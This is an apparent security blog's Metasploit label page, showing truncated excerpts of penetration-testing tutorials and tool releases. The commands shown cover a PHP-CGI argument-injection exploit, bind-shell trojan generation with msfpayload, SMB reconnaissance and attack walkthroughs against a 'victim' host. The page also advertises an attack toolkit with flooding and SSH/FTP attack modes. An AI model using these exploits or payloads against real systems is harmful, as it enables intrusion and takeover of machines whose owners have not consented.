
Showing posts with the label Metasploit

Forensic - File Recovery (Fire With Metasploit)

Hi guys, missing me? I think most of you have been looking forward to my post =)) As I promised earlier this year, I will be discussing forensics a lot. So, here is my write-up this time.

Equipment:
1. Metasploit

Note: make sure you already have a meterpreter session before this stage.

The next stage is selecting the module "enum_drives". This module will list the physical drives and logical volumes.

msf > use post/windows/gather/forensics/enum_drives
msf post(enum_drives) > show options
msf post(enum_drives) > set SESSION 1
msf post(enum_drives) > run

Several logical volumes are shown; I then chose drive "E" to test the module "recovery_files". This module lists and tries to recover deleted files from NTFS file systems.

msf post(enum_drives) > use post/windows/gather/forensics/recovery_files
msf post(recovery_files) > show options
msf post(recovery_files) > set SESSION ...

Exploit php Injection obtain user Hashes

Hello all. Are you still loyal to my posts? :) On this occasion I will show a few techniques for those of you who like penetration testing. As you know, a penetration test does not simply stop when it runs into a problem, so on this occasion I will share some of these issues so that we can overcome them. At this stage I will try to exploit an existing weakness in the CGI (Common Gateway Interface) for PHP (Personal Home Page) 5.x.x.

Description: When run as a CGI, PHP 5.3.12 and up to version 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. (You can find the complete information by typing info while using the module.)

OK, now I will show you how :) Open Metasploit using the command:

# msfconsole

Then type this command to use the module:

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploi...

Analyzing PDF Contains a Trojan

Introduction: On this occasion I will write up some stages of how to analyze a document file with the extension *.PDF to determine whether it is malicious or not. This happened some time ago when I tried to download a study guide book and the file was detected by the anti-virus that I use. This created great suspicion, so I tried to analyze the file, and my guess was right: the document contains JavaScript, which turns out to be a payload script wrapped into the document. These are some of the steps that I took to analyze it. I will do a comparison between a clean PDF document and a document containing a trojan.

Equipment:
1. pdfid
2. pdf-parser
3. pdftk ('apt-get install pdftk')
4. strings

In the first stage I will analyze the document "analysis.pdf", which is not infected by a trojan. OK, now let's go!

Test a PDF file:

# pdfid analysis.pdf

In the output, we just need to pay attention to the JS / JavaScript lines, and it turns out the output you ...

Minisplo1t v.2 Final RELEASE

Happy new year, Happy new year =)) As I promised earlier, today I officially released Minisplo1t v.2.

Screenshots of Minisplo1t v.2 Final Release: Main Menu 1, Main Menu 2, Main Menu 3, Main Menu 4, Main Menu 5.

I designed the tool in the bash scripting language, and it is open source, bro =)) I like open source =))

How to:
Download the file by clicking the download button below and save it in the root directory.

Extract the file:
tar -xvf Minisploi-v2-Final.tar

Install the file configuration:
./install.sh

Start Minisploit:
cd Minisploit-Final/
./minisplo1t.sh

DOWNLOAD

Best regards,
Hidemichi-Hiroyuki a.k.a [H2]

Exploit Samba PART II "Trojan Uploaded"

Before reading this post, it helps to read the first post: http://h2-exploitation.blogspot.com/2013/10/exploit-samba-smbclient.html

In that post I discussed how the attacker got access rights to a shared folder over port 445. In the previous post, the attacker could only access one folder and was not permitted to see the Users folder, the Windows folder, or other important folders. So, in this post we will see how the attacker gains full access rights like an admin.

Equipment:
1. Smbclient
2. Metasploit
3. Netcat

Connecting using SmbClient:

# smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445]

There are two files and one folder, but that does not satisfy me. I then go on to build a Bind TCP payload:

# msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/Cantik.exe

After storing the payload in the Desktop directory, I disconnect from the victim host and then go into the Desktop director...

[RELEASE] Minisploit v 0.1

After a long time without posting on the blog, I am finally back with a simple tool written in the bash programming language. I designed this simple tool to make testing simpler for users of Linux pentest editions (Linux and Backtrack). I do not know much about bash programming, so I'm sorry if the script is very bad.

Category:
1. Analysis
    1. Bluetooth Phone Attack
    2. FTP ATTACK
    3. SSH ATTACK
2. Stress Testing
    1. Crack Route
    2. Kill All
    3. Flood Mode
    4. Blacklist
3. Mini Exploit
    1. AutoPwn
        1. Addons Firefox
        2. Browser Autopwn
    2. Generate Payload
        1. Meterpreter Reverse Tcp
        2. Shell Bind Tcp

Extract the file:
# tar -xvf minisploit.tar

Permission:
# chmod +x minisploit.sh

Regards,
Hidemichi-Hiroyuki a.k.a [H2]

Exploit Samba "SmbClient"

Like FTP (File Transfer Protocol), Samba operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server, and so on. In this case the victim has to allow shared folders or files.

Equipment:
1. SmbClient
2. Nmap
3. Metasploit

The first step: scan the ports of the victim's IP address using Nmap. The port we need here is port 445 (microsoft-ds).

# nmap (Victim Ip-Address)

As seen in the picture above, I am lucky :) Now, let us look at the contents of the port:

# nmap -p445 --script=smb-os-discovery (Victim Ip-Address)

--script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139).

As seen in the picture above, it turns out the victim uses the Windows 7 Ultimate operating system. Computer Name And NetBIOS Name is a ANONYMOUS-...